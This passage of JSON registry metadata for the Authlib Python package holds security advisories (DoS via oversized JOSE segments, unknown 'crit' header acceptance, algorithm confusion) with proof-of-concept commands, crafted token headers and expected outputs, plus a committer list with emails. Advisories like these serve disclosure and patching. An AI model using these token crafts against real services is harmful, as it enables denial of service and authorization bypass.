`authlib/authlib/jose/rfc7516/jwe.py`","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2025-10-10T22:54:03.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":6.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H","references":["https://github.com/authlib/authlib/security/advisories/GHSA-g7f3-828f-7h7m","https://github.com/authlib/authlib/commit/e0863d5129316b1790eee5f14cece32a03b8184d","https://nvd.nist.gov/vuln/detail/CVE-2025-62706","https://lists.debian.org/debian-lts-announce/2025/10/msg00032.html","https://github.com/advisories/GHSA-g7f3-828f-7h7m"],"source_kind":"github","identifiers":["GHSA-g7f3-828f-7h7m","CVE-2025-62706"],"repository_url":"https://github.com/authlib/authlib","blast_radius":0.0,"created_at":"2025-10-10T23:00:08.496Z","updated_at":"2026-06-13T17:02:51.200Z","epss_percentage":0.00137,"epss_percentile":0.3356,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1nN2YzLTgyOGYtN2g3bc4ABNQ9","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1nN2YzLTgyOGYtN2g3bc4ABNQ9","packages":[{"ecosystem":"pypi","package_name":"authlib","versions":[{"first_patched_version":"1.6.5","vulnerable_version_range":"\u003c 1.6.5"}],"purl":"pkg:pypi/authlib"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1nN2YzLTgyOGYtN2g3bc4ABNQ9/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1wcTVwLTM0Y3ItMjN2Oc4ABNQu","url":"https://github.com/advisories/GHSA-pq5p-34cr-23v9","title":"Authlib is vulnerable to Denial of Service via Oversized JOSE Segments","description":"**Summary**\nAuthlib’s JOSE implementation accepts unbounded JWS/JWT header and signature segments. A remote attacker can craft a token whose base64url‑encoded header or signature spans hundreds of megabytes. During verification, Authlib decodes and parses the full input before it is rejected, driving CPU and memory consumption to hostile levels and enabling denial of service.\n\n**Impact**\n\n- Attack vector: unauthenticated network attacker submits a malicious JWS/JWT.\n\n- Effect: base64 decode + JSON/crypto processing of huge buffers pegs CPU and allocates large amounts of RAM; a single request can exhaust service capacity.\n\n- Observed behaviour: on a test host, the legacy code verified a 500 MB header, consuming ~4 GB RSS and ~9 s CPU before failing.\n\n- Severity: High. CVSS v3.1: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H (7.5).\n\nAffected Versions\nAuthlib ≤ 1.6.3 (and earlier) when verifying JWS/JWT tokens. Later snapshots with 256 KB header/signature limits are not affected.\n\n**Proof of concept**\n\nLocal demo (do not run against third-party systems):\nDownload [jws_segment_dos_demo.py](https://github.com/user-attachments/files/22450820/jws_segment_dos_demo.py) the PoC in direcotry authlib/\nRun following Command\n```\npython3 jws_segment_dos_demo.py --variant both --sizes \"500MB\" --fork-per-case\n\n```\nEnvironment: Python 3.13.6, Authlib 1.6.4, Linux x86_64, CPUs=8 \nSample output: Refined\n\u003cimg width=\"1295\" height=\"306\" alt=\"image\" src=\"https://github.com/user-attachments/assets/6dd8410f-bc36-4717-8cee-649bac9bf291\" /\u003e\n\n\n\n\nThe compilation script prints separate “[ATTACKER]” (token construction) and “[SERVER]” (Authlib verification) RSS deltas so defenders can distinguish client-side preparation from server-side amplification. Regression tests authlib/tests/dos/test_jose_dos.py further capture the issue; the saved original_util.py/original_jws.py reproductions still accept the malicious payload.\n\n**Remediation**\n\n- Apply the upstream patch that introduces decoded size limits:\n\n- MAX_HEADER_SEGMENT_BYTES = 256 KB\n\n- MAX_SIGNATURE_SEGMENT_BYTES = 256 KB\n\n- Enforce Limits in authlib/jose/util.extract_segment and _extract_signature.\n\n- Deploy the patched release immediately.\n\n- For additional defence in depth, reject JWS/JWT inputs above a few kilobytes at the proxy or WAF layer, and rate-limit verification endpoints.\n\n**Workarounds (temporary)**\n\n- Enforce input size limits before handing tokens to Authlib.\n\n- Use application-level throttling to reduce amplification risk.\n\n**Resources**\n\n- Demo script: jws_segment_dos_demo.py\n\n- Tests: authlib/tests/dos/test_jose_dos.py\n\n- OWASP JWT Cheat Sheet (DoS guidance)","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2025-10-10T20:26:43.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","references":["https://github.com/authlib/authlib/security/advisories/GHSA-pq5p-34cr-23v9","https://github.com/authlib/authlib/commit/867e3f87b072347a1ae9cf6983cc8bbf88447e5e","https://nvd.nist.gov/vuln/detail/CVE-2025-61920","https://lists.debian.org/debian-lts-announce/2025/10/msg00032.html","https://github.com/advisories/GHSA-pq5p-34cr-23v9"],"source_kind":"github","identifiers":["GHSA-pq5p-34cr-23v9","CVE-2025-61920"],"repository_url":"https://github.com/authlib/authlib","blast_radius":0.0,"created_at":"2025-10-10T21:00:08.434Z","updated_at":"2026-06-04T03:02:45.948Z","epss_percentage":0.00424,"epss_percentile":0.62503,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1wcTVwLTM0Y3ItMjN2Oc4ABNQu","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1wcTVwLTM0Y3ItMjN2Oc4ABNQu","packages":[{"ecosystem":"pypi","package_name":"authlib","versions":[{"first_patched_version":"1.6.5","vulnerable_version_range":"\u003c 1.6.5"}],"purl":"pkg:pypi/authlib"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1wcTVwLTM0Y3ItMjN2Oc4ABNQu/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS05Z2dyLTI0NjQtMmozMs4ABMaY","url":"https://github.com/advisories/GHSA-9ggr-2464-2j32","title":"Authlib: JWS/JWT accepts unknown crit headers (RFC violation → possible authz bypass)","description":"## Summary\nAuthlib’s JWS verification accepts tokens that declare unknown critical header parameters (`crit`), violating RFC 7515 “must‑understand” semantics. An attacker can craft a signed token with a critical header (for example, `bork` or `cnf`) that strict verifiers reject but Authlib accepts. In mixed‑language fleets, this enables split‑brain verification and can lead to policy bypass, replay, or privilege escalation.\n\n## Affected Component and Versions\n- Library: Authlib (JWS verification)\n- API: `authlib.jose.JsonWebSignature.deserialize_compact(...)`\n- Version tested: 1.6.3\n- Configuration: Default; no allowlist or special handling for `crit`\n\n## Details\nRFC 7515 (JWS) §4.1.11 defines `crit` as a “must‑understand” list: recipients MUST understand and enforce every header parameter listed in `crit`, otherwise they MUST reject the token. Security‑sensitive semantics such as token binding (e.g., `cnf` from RFC 7800) are often conveyed via `crit`.\n\nObserved behavior with Authlib 1.6.3:\n- When a compact JWS contains a protected header with `crit: [\"cnf\"]` and a `cnf` object, or `crit: [\"bork\"]` with an unknown parameter, Authlib verifies the signature and returns the payload without rejecting the token or enforcing semantics of the critical parameter.\n- By contrast, Java Nimbus JOSE+JWT (9.37.x) and Node `jose` v5 both reject such tokens by default when `crit` lists unknown names.\n\nImpact in heterogeneous fleets:\n- A strict ingress/gateway (Nimbus/Node) rejects a token, but a lenient Python microservice (Authlib) accepts the same token. This split‑brain acceptance bypasses intended security policies and can enable replay or privilege escalation if `crit` carries binding or policy information.\n\n## Proof of Concept (PoC)\nThis repository provides a multi‑runtime PoC demonstrating the issue across Python (Authlib), Node (`jose` v5), and Java (Nimbus).\n\n### Prerequisites\n- Python 3.8+\n- Node.js 18+\n- Java 11+ with Maven\n\n### Setup\n\nEnter the directory **authlib-crit-bypass-poc** \u0026 run following commands.\n```bash\nmake setup\nmake tokens\n```\n\n### Tokens minted\n- `tokens/unknown_crit.jwt` with protected header:\n  `{ \"alg\": \"HS256\", \"crit\": [\"bork\"], \"bork\": \"x\" }`\n- `tokens/cnf_header.jwt` with protected header:\n  `{ \"alg\": \"HS256\", \"crit\": [\"cnf\"], \"cnf\": {\"jkt\": \"thumb-42\"} }`\n\n### Reproduction\nRun the cross‑runtime demo:\n```bash\nmake  demo\n```\n\nExpected output for each token (strict verifiers reject; Authlib accepts):\n\nFor `tokens/unknown_crit.jwt`:\n```\nStrict(Nimbus): REJECTED (unknown critical header: bork)\nStrict(Node jose): REJECTED (unrecognized crit)\nLenient(Authlib): ACCEPTED -\u003e payload={'sub': '123', 'role': 'user'}\n```\n\nFor `tokens/cnf_header.jwt`:\n```\nStrict(Nimbus): REJECTED (unknown critical header: cnf)\nStrict(Node jose): REJECTED (unrecognized crit)\nLenient(Authlib): ACCEPTED -\u003e payload={'sub': '123', 'role': 'user'}\n```\n\nEnvironment notes:\n- Authlib version used: `1.6.3` (from PyPI)\n- Node `jose` version: `^5`\n- Nimbus JOSE+JWT version: `9.37.x`\n- HS256 secret is 32 bytes to satisfy strict verifiers: `0123456789abcdef0123456789abcdef`\n\n## Impact\n- Class: Violation of JWS `crit` “must‑understand” semantics; specification non‑compliance leading to authentication/authorization policy bypass.\n- Who is impacted: Any service that relies on `crit` to carry mandatory security semantics (e.g., token binding via `cnf`) or operates in a heterogeneous fleet with strict verifiers elsewhere.\n- Consequences: Split‑brain acceptance (gateway rejects while a backend accepts), replay, or privilege escalation if critical semantics are ignored.\n\n## References\n- RFC 7515: JSON Web Signature (JWS), §4.1.11 `crit`\n- RFC 7800: Proof‑of‑Possession Key Semantics for JWTs (`cnf`)","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2025-09-22T14:42:12.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N","references":["https://github.com/authlib/authlib/security/advisories/GHSA-9ggr-2464-2j32","https://github.com/authlib/authlib/commit/6b1813e4392eb7c168c276099ff7783b176479df","https://nvd.nist.gov/vuln/detail/CVE-2025-59420","https://lists.debian.org/debian-lts-announce/2025/10/msg00032.html","https://github.com/advisories/GHSA-9ggr-2464-2j32"],"source_kind":"github","identifiers":["GHSA-9ggr-2464-2j32","CVE-2025-59420"],"repository_url":"https://github.com/authlib/authlib","blast_radius":0.0,"created_at":"2025-09-22T15:00:20.804Z","updated_at":"2026-06-09T13:03:21.567Z","epss_percentage":0.00015,"epss_percentile":0.03101,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS05Z2dyLTI0NjQtMmozMs4ABMaY","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS05Z2dyLTI0NjQtMmozMs4ABMaY","packages":[{"ecosystem":"pypi","package_name":"authlib","versions":[{"first_patched_version":"1.6.4","vulnerable_version_range":"\u003c 1.6.4"}],"purl":"pkg:pypi/authlib"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS05Z2dyLTI0NjQtMmozMs4ABMaY/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS01MzU3LWMyangtdjdxaM4AA83F","url":"https://github.com/advisories/GHSA-5357-c2jx-v7qh","title":"Authlib has algorithm confusion with asymmetric public keys","description":"lepture Authlib before 1.3.1 has algorithm confusion with asymmetric public keys. Unless an algorithm is specified in a jwt.decode call, HMAC verification is allowed with any asymmetric public key. (This is similar to CVE-2022-29217 and CVE-2024-33663.)","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2024-06-09T21:30:33.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.4,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N","references":["https://nvd.nist.gov/vuln/detail/CVE-2024-37568","https://github.com/lepture/authlib/issues/654","https://github.com/pypa/advisory-database/tree/main/vulns/authlib/PYSEC-2024-52.yaml","https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/IZI7HYGN7VZAYFV6UV3SRLYF7QGERXIU","https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FHJI32SN4FNAUVNALVGOKWHNSQ6XS3M5","https://www.vicarius.io/vsociety/posts/algorithm-confusion-in-lepture-authlib-cve-2024-37568","https://lists.debian.org/debian-lts-announce/2025/10/msg00032.html","https://github.com/advisories/GHSA-5357-c2jx-v7qh"],"source_kind":"github","identifiers":["GHSA-5357-c2jx-v7qh","CVE-2024-37568"],"repository_url":"https://github.com/lepture/authlib","blast_radius":0.0,"created_at":"2024-06-10T16:05:50.626Z","updated_at":"2026-06-01T17:05:47.425Z","epss_percentage":0.00145,"epss_percentile":0.34533,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS01MzU3LWMyangtdjdxaM4AA83F","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS01MzU3LWMyangtdjdxaM4AA83F","packages":[{"ecosystem":"pypi","package_name":"authlib","versions":[{"first_patched_version":"1.3.1","vulnerable_version_range":"\u003e= 0, \u003c 1.3.1"}],"purl":"pkg:pypi/authlib"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS01MzU3LWMyangtdjdxaM4AA83F/related_packages","related_advisories":[]}],"docker_usage_url":"https://docker.ecosyste.ms/usage/pypi/authlib","docker_dependents_count":63,"docker_downloads_count":62849134,"usage_url":"https://repos.ecosyste.ms/usage/pypi/authlib","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/pypi/authlib/dependencies","status":null,"funding_links":["https://github.com/sponsors/lepture","https://github.com/sponsors/authlib"],"critical":null,"issue_metadata":{"last_synced_at":"2026-06-12T18:02:39.024Z","issues_count":57,"pull_requests_count":83,"avg_time_to_close_issue":30997660.782608695,"avg_time_to_close_pull_request":1533216.530612245,"issues_closed_count":23,"pull_requests_closed_count":49,"pull_request_authors_count":29,"issue_authors_count":43,"avg_comments_per_issue":1.7894736842105263,"avg_comments_per_pull_request":0.7951807228915663,"merged_pull_requests_count":46,"bot_issues_count":0,"bot_pull_requests_count":1,"past_year_issues_count":36,"past_year_pull_requests_count":60,"past_year_avg_time_to_close_issue":1361940.1538461538,"past_year_avg_time_to_close_pull_request":666197.59375,"past_year_issues_closed_count":13,"past_year_pull_requests_closed_count":32,"past_year_pull_request_authors_count":20,"past_year_issue_authors_count":27,"past_year_avg_comments_per_issue":1.25,"past_year_avg_comments_per_pull_request":0.8666666666666667,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":1,"past_year_merged_pull_requests_count":31,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/issues","maintainers":[{"login":"azmeuk","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/azmeuk"},{"login":"lepture","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lepture"}],"active_maintainers":[{"login":"azmeuk","count":27,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/azmeuk"},{"login":"lepture","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lepture"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/authlib/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/authlib/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/authlib/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/authlib/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/authlib/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/authlib/codemeta","maintainers":[{"uuid":"lepture","login":"lepture","name":null,"email":null,"url":null,"packages_count":41,"html_url":"https://pypi.org/user/lepture/","role":null,"created_at":"2022-11-14T18:17:47.300Z","updated_at":"2022-11-14T18:17:47.300Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/maintainers/lepture/packages"}],"registry":{"name":"pypi.org","url":"https://pypi.org","ecosystem":"pypi","default":true,"packages_count":884815,"maintainers_count":378841,"namespaces_count":0,"keywords_count":289179,"github":"pypi","metadata":{"funded_packages_count":54301},"icon_url":"https://github.com/pypi.png","created_at":"2022-04-04T15:19:23.364Z","updated_at":"2026-06-10T05:13:28.296Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/namespaces"}},{"id":12547600,"name":"py-authlib","ecosystem":"spack","description":"The ultimate Python library in building OAuth and OpenID Connect\nservers. JWS, JWK, JWA, JWT are included.\n","homepage":"https://github.com/authlib/authlib","licenses":"[]","normalized_licenses":["Other"],"repository_url":"https://github.com/authlib/authlib","keywords_array":[],"namespace":null,"versions_count":2,"first_release_published_at":"2025-12-03T10:48:43.734Z","latest_release_published_at":"2026-02-14T00:02:17.788Z","latest_release_number":"1.6.7","last_synced_at":"2026-06-13T00:02:25.919Z","created_at":"2025-12-03T10:48:42.746Z","updated_at":"2026-06-13T00:02:25.919Z","registry_url":"https://packages.spack.io/package.html?name=py-authlib","install_command":"spack install py-authlib","documentation_url":null,"metadata":{},"repo_metadata":{},"repo_metadata_updated_at":"2025-12-03T10:48:44.411Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":53.021639197219415,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":26.510819598609707},"purl":"pkg:spack/py-authlib","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/spack/py-authlib","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/spack/py-authlib","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/spack/py-authlib/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":null,"versions_url":"https://packages.ecosyste.ms/api/v1/registries/spack.io/packages/py-authlib/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/spack.io/packages/py-authlib/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/spack.io/packages/py-authlib/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/spack.io/packages/py-authlib/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/spack.io/packages/py-authlib/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/spack.io/packages/py-authlib/codemeta","maintainers":[],"registry":{"name":"spack.io","url":"https://packages.spack.io","ecosystem":"spack","default":true,"packages_count":9183,"maintainers_count":989,"namespaces_count":0,"keywords_count":3801,"github":"spack","metadata":{"funded_packages_count":440},"icon_url":"https://github.com/spack.png","created_at":"2022-04-04T15:19:23.514Z","updated_at":"2026-06-10T05:19:56.194Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/spack.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/spack.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/spack.io/namespaces"}}],"commits":{"id":9801599,"full_name":"authlib/authlib","default_branch":"main","total_commits":1529,"total_committers":139,"total_bot_commits":1,"total_bot_committers":1,"mean_commits":11.0,"dds":0.2334859385219098,"past_year_total_commits":194,"past_year_total_committers":12,"past_year_total_bot_commits":1,"past_year_total_bot_committers":1,"past_year_mean_commits":16.166666666666668,"past_year_dds":0.35567010309278346,"last_synced_at":"2026-03-31T00:13:22.594Z","last_synced_commit":"10401635d06f59aa282d3367b38dba73574a9127","created_at":"2025-04-30T08:10:45.488Z","updated_at":"2026-03-31T00:09:14.552Z","committers":[{"name":"Hsiaoming Yang","email":"me@lepture.com","login":"lepture","count":1172},{"name":"Éloi Rivard","email":"eloi@yaal.coop","login":"azmeuk","count":175},{"name":"Ber Zoidberg","email":"ber.zoidberg@gmail.com","login":"dustydecapod","count":7},{"name":"Kai A. Hiller","email":"git@kaialexhiller.de","login":"V02460","count":4},{"name":"Kartik Ohri","email":"kartikohri13@gmail.com","login":"amCap1712","count":4},{"name":"Jaap Roes","email":"jroes@leukeleu.nl","login":"jaap3","count":4},{"name":"Félix Rohrlich","email":"felix@yaal.coop","login":null,"count":4},{"name":"Tom Christie","email":"tom@tomchristie.com","login":"tomchristie","count":3},{"name":"Rogier van der Geer","email":"rogiervandergeer@godatadriven.com","login":"rogiervandergeer","count":3},{"name":"Pablo Marti","email":"pablo@albanta.eu","login":"pablogamboa","count":3},{"name":"Nikita Spivachuk","email":"nikita.spivachuk@dsr-corporation.com","login":"spivachuk","count":3},{"name":"Grey Li","email":"withlihui@gmail.com","login":"greyli","count":3},{"name":"Alex Ball","email":"alex-ball","login":"alex-ball","count":3},{"name":"Dong","email":"liudonggalaxy@gmail.com","login":"liudonggalaxy","count":2},{"name":"François Voron","email":"fvoron@gmail.com","login":"frankie567","count":2},{"name":"Bastian Venthur","email":"mail@venthur.de","login":"venthur","count":2},{"name":"princekhunt","email":"info@princekhunt.com","login":"princekhunt","count":2},{"name":"Tomasz Kontusz","email":"tomasz.kontusz@gmail.com","login":"ktosiek","count":2},{"name":"Tim Gates","email":"tim.gates@iress.com","login":"timgates42","count":2},{"name":"Thomas Scholtes","email":"geigerzaehler@axiom.fm","login":"geigerzaehler","count":2},{"name":"Jacopo Nespolo","email":"jacopo.nespolo@exact-lab.it","login":"jacopo-exact","count":2},{"name":"Mario Jimenez Carrasco","email":"mario.carrasco@gmail.com","login":"isccarrasco","count":2},{"name":"Randy Duodu","email":"duodurandy19@gmail.com","login":"iSOLveIT","count":2},{"name":"Dave Hallam","email":"dhallammail-github@yahoo.com","login":"dhallam","count":2},{"name":"Jay Turner","email":"jay.turner@kayenta.io","login":"TurnrDev","count":2},{"name":"Vlad Dmitrievich","email":"2tunnels@gmail.com","login":null,"count":2},{"name":"Thibault","email":"thibault@Thibaults-MacBook-Pro.local","login":null,"count":2},{"name":"Max Murashov","email":"m.murashov@rambler-co.ru","login":null,"count":2},{"name":"Borislav Ivanov","email":"borislav.ivanov@hyperscience.com","login":"borislaviv","count":1},{"name":"Cattī Crūdēlēs","email":"17695588+wzy9607","login":"wzy9607","count":1},{"name":"Friedger Müffke","email":"friedger@gmail.com","login":"friedger","count":1},{"name":"Florian Preinstorfer","email":"site-github@nblock.org","login":"nblock","count":1},{"name":"Florian Klink","email":"flokli@flokli.de","login":"flokli","count":1},{"name":"Eugene","email":"gish.ee18@gmail.com","login":"Fogapod","count":1},{"name":"David Schnurr","email":"dschnurr@openai.com","login":"schnerd","count":1},{"name":"Daniel Höxtermann","email":"daniel@hxtm.dev","login":"hxtmdev","count":1},{"name":"Daniel Erenrich","email":"daniel@erenrich.net","login":"derenrich","count":1},{"name":"Daisuke Taniwaki","email":"daisuketaniwaki@gmail.com","login":"dtaniwaki","count":1},{"name":"Cole Winstanley","email":"31896149+crw2998","login":"crw2998","count":1},{"name":"Christian Clauss","email":"cclauss@me.com","login":"cclauss","count":1},{"name":"Christian","email":"59786962+christian-hawk","login":"christian-hawk","count":1},{"name":"Chris Adams","email":"chris@improbable.org","login":"acdha","count":1},{"name":"Gary Gale","email":"gary@vicchi.org","login":"vicchi","count":1},{"name":"Gula Aren","email":"36400180+GulaAren","login":"GulaAren","count":1},{"name":"Hammy Goonan","email":"hammy@falconry.io","login":"hammygoonan","count":1},{"name":"Jackie","email":"52658745+1wpro2","login":"1wpro2","count":1},{"name":"Hung Tse Lee","email":"hungtsetse@gmail.com","login":"hungtsetse","count":1},{"name":"Hoeseong Kim","email":"hsgkim@snu.ac.kr","login":"hsgkim","count":1},{"name":"Alek Lefebvre","email":"alek.lefebvre@mail.mcgill.ca","login":null,"count":1},{"name":"Chih-Hsuan Yen","email":"yan12125@gmail.com","login":null,"count":1},{"name":"Kamil Niski","email":"kamil.niski@gmail.com","login":null,"count":1},{"name":"Maxim Danilov","email":"maxim@wpsoft.at","login":null,"count":1},{"name":"Zheng, Ping","email":"pingz@pingz.info","login":null,"count":1},{"name":"Andrey Paramonov","email":"cmr.pent@gmail.com","login":"aparamon","count":1},{"name":"Anders Nauman","email":"anders.nauman@gmail.com","login":"andersnauman","count":1},{"name":"Aliaksei Urbanski","email":"aliaksei.urbanski@gmail.com","login":"Jamim","count":1},{"name":"Alexandr","email":"stefanitsky.mozdor@gmail.com","login":"stefanitsky","count":1},{"name":"Alexander Viklund","email":"bullfest@sthlm.dev","login":"bullfest","count":1},{"name":"Alexander Lötvall","email":"alexander.lotvall@kognity.com","login":"lotvall","count":1},{"name":"Alex Plugaru","email":"xarg","login":"xarg","count":1},{"name":"Alex Coleman","email":"alex.coleman@dft.gov.uk","login":"Sparrow0hawk","count":1},{"name":"Adrian Moennich","email":"adrian@planetcoding.net","login":"ThiefMaster","count":1},{"name":"Adam Williamson","email":"awilliam@redhat.com","login":"AdamWill","count":1},{"name":"Adam Johnson","email":"me@adamj.eu","login":"adamchainz","count":1},{"name":"Andrii","email":"nikolayenko.andrew@gmail.com","login":"anikolaienko","count":1},{"name":"Arthur Corenzan","email":"arthur@corenzan.com","login":"haggen","count":1},{"name":"Ben Davis","email":"bendavis78@gmail.com","login":"bendavis78","count":1},{"name":"Bjoern Meier","email":"2581775+bjoernmeier","login":"bjoernmeier","count":1},{"name":"Bob Haddleton","email":"bobh66","login":"bobh66","count":1},{"name":"Hilla Shahrabani","email":"hilla.sh@gmail.com","login":"HillaShx","count":1},{"name":"Laszlo Rozsahegyi","email":"laszlo@rozsahegyi.info","login":"laszlo-r","count":1},{"name":"Thijs Walcarius","email":"thijs.walcarius@ugent.be","login":"twalcari","count":1},{"name":"TheLazzziest","email":"mxyakovenko9@gmail.com","login":"TheLazzziest","count":1},{"name":"Tarun Bhardwaj","email":"mailme@tarunbhardwaj.com","login":"tarunbhardwaj","count":1},{"name":"Tangui Le Pense","email":"29804907+tanguilp","login":"tanguilp","count":1},{"name":"Stu Tomlinson","email":"stu@nosnilmot.com","login":"nosnilmot","count":1},{"name":"Songmin Li","email":"lisongmin@protonmail.com","login":"lisongmin","count":1},{"name":"Soasme","email":"soasme","login":"soasme","count":1},{"name":"Sam Mosleh","email":"sam.mosleh@ut.ac.ir","login":"sam-mosleh","count":1},{"name":"Sam Bellen","email":"sambellen@gmail.com","login":"Sambego","count":1},{"name":"SGBye","email":"44101656+SGBye","login":"SGBye","count":1},{"name":"Rushil Srivastava","email":"rushu0922@gmail.com","login":"rushilsrivastava","count":1},{"name":"Rufus","email":"73200607+dp-rufus","login":"dp-rufus","count":1},{"name":"Rostyslav Lyulinetskyy","email":"rostik@dicehub.com","login":"rostikL","count":1},{"name":"Riccardo Magliocchetti","email":"riccardo.magliocchetti@gmail.com","login":"xrmx","count":1},{"name":"Raphael Ahrens","email":"raphaelahrens@googlemail.com","login":"raphaelahrens","count":1},{"name":"Prilkop","email":"AdamRimon@gmail.com","login":"adamrimon","count":1},{"name":"Vihang Mehta","email":"vihangm","login":"vihangm","count":1},{"name":"timfeirg","email":"kkcocogogo@gmail.com","login":"timfeirg","count":1},{"name":"shininglegend","email":"72107680+shininglegend","login":"shininglegend","count":1},{"name":"rorour","email":"ravenmarieorourke@gmail.com","login":"rorour","count":1},{"name":"richardsheridan","email":"richard.sheridan@gmail.com","login":"richardsheridan","count":1},{"name":"nebularazer","email":"nebularazer@gmail.com","login":"nebularazer","count":1},{"name":"looi","email":"looi","login":"looi","count":1},{"name":"ldng","email":"ludovic+gh@danigo.net","login":"ldng","count":1},{"name":"jordivandooren","email":"jordivandooren@gmail.com","login":"jordivandooren","count":1},{"name":"jonathanunderwood","email":"jonathan.underwood@gmail.com","login":"jonathanunderwood","count":1},{"name":"dklimpel","email":"5740567+dklimpel","login":"dklimpel","count":1},{"name":"dependabot[bot]","email":"49699333+dependabot[bot]","login":"dependabot[bot]","count":1},{"name":"charity-detalytics","email":"thien.nguyen@detalytics.com","login":"charity-detalytics","count":1},{"name":"aradnaev","email":"Alexander.Radnaev@gmail.com","login":"aradnaev","count":1},{"name":"Zizhong Zhang","email":"zzz@heygen.com","login":"zzz-heygen","count":1},{"name":"Yong Wen Chua","email":"lawliet89","login":"lawliet89","count":1},{"name":"Wauplin","email":"lucainp@gmail.com","login":"Wauplin","count":1},{"name":"Kyle Zhou","email":"kyle.zhou@live.com","login":"kylezhou","count":1},{"name":"Kyle Birkeland","email":"kylebirkeland@gmail.com","login":"kbirkeland","count":1},{"name":"Kujiy","email":"kujiy","login":"kujiy","count":1},{"name":"Konstantin Köhring","email":"konstantin.koehring@peerox.de","login":"Galaxy102","count":1},{"name":"Klaus Schwartz","email":"tntclaus","login":"tntclaus","count":1},{"name":"Kiss Benedek Máté","email":"42411122+Tasztalos69","login":"Tasztalos69","count":1},{"name":"Kesav Kolla","email":"kesavkolla+github@gmail.com","login":"kesavkolla","count":1},{"name":"Joshua Parkin","email":"joshuadparkin@gmail.com","login":"jdeepee","count":1},{"name":"Jorge Alejandro Jiménez Luna","email":"jorgeajimenezl17@gmail.com","login":"jorgeajimenezl","count":1},{"name":"Joost Cassee","email":"joost@cassee.net","login":"jcassee","count":1},{"name":"Jonas Svensson","email":"jonas.s.svensson@gmail.com","login":"josven","count":1},{"name":"Jimmy Thrasibule","email":"jimmy@thrasibule.mx","login":"jimmy-lt","count":1},{"name":"Jeremy Wright","email":"jeremy@quiescent.us","login":"JeremyLWright","count":1},{"name":"Jelle Besseling","email":"jelle@pingiun.com","login":"pingiun","count":1},{"name":"Jay Turner","email":"jayturner1832@gmail.com","login":"steelwalrus","count":1},{"name":"Nuno Santos","email":"nunofvsantos@gmail.com","login":"nfvs","count":1},{"name":"Jan-Wijbrand 